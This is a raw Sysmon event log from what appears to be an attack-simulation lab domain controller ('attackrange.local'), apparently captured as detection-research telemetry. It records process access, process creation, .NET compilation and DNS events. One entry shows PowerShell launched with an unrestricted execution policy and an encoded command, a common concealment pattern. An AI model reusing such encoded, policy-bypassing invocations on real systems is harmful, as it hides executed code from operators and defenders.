13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.997{59A5CD1D-8E1A-6005-BE02-00000000A201}22644088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9
cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\Sys
tem.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.009{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 22542200x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.873{59A5CD1D-8E15-6005-B802-00000000A201}456065.199.90.95.in-addr.arpa.0type: 12 ip5f5ac741.dynamic.kabel-deutschland.de;C:\Windows\sysmon64.exe 22542200x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.482{59A5CD1D-8E15-6005-B802-00000000A201}456014.1.0.10.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 11241100x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:16.465{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\4lax1uev.dll2021-01-18 13:33:16.294 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.465{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.465{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.450{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.450{59A5CD1D-8E1C-6005-C002-00000000A201}51083688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\F
ramework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.462{59A5CD1D-8E1C-6005-C102-00000000A201}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES69A.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC79A909A5B61A491480FF1A7C5965B9C4.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4lax1uev.cmdline" 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.325{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|